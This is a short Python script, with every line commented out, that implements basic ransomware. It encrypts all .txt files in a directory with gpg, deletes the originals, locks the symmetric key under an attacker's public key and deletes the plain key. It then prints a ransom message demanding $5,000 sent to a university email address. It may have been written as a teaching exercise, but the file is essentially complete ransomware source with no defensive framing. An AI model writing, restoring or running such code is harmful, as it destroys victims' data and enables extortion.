#!/usr/bin/env python
#import sys, subprocess, shlex
#import glob
#import random, string

#RANSOM_KEY = "keys/ransom.key"
#PUB_KEY = "keys/ransompubkey.asc"

#Generates a random string 20 characters long
#def genRandSymKey():
#	letters = string.ascii_letters
#	return ''.join(random.choice(letters) for i in range (20))
#Writes passphrase generated by genRandSymKey() to keys/ransom.key
#def writeSymKey():
#	passphrase = genRandSymKey()
#	out = open(RANSOM_KEY, 'w')
#	out.writelines(passphrase)
#	out.close()
#Encrypts all .txt files in directory using symmetric keys/ransom.key
#def encryptFiles():
#	writeSymKey()
#	for item in glob.glob("*.txt"):
#		file = item
#		args = shlex.split("gpg -c --batch --passphrase-file "+RANSOM_KEY+" "+file)
#		subprocess.call(args)
#		rmvFiles(item)
#removes files passed as a parameter
#def rmvFiles(filename):
#	args = shlex.split("rm "+filename)
#	subprocess.call(args)
#Encrypts symmetric keys/ransom.key with asymmetric keys/ransompubkey.asc 
#def encryptSymKey():
#	args = shlex.split("gpg -e --output keys/ransom.key.asc --recipient-file "+PUB_KEY+" "+RANSOM_KEY)
#	subprocess.call(args)
#	rmvSymKey()
#deletes Symmetric key keys/ransom.key
#def rmvSymKey():
#	args = shlex.split("rm "+RANSOM_KEY)
#	subprocess.call(args)
#Displays ransom message
#def ransomMessage():
#	print("Your text files are encrypted. To Decrypt them,"+
#		" you need to pay me $5,000 and send ransom.key.asc file in keys folder to bv457@uowmail.edu.au")

#encryptFiles()
#encryptSymKey()
#ransomMessage()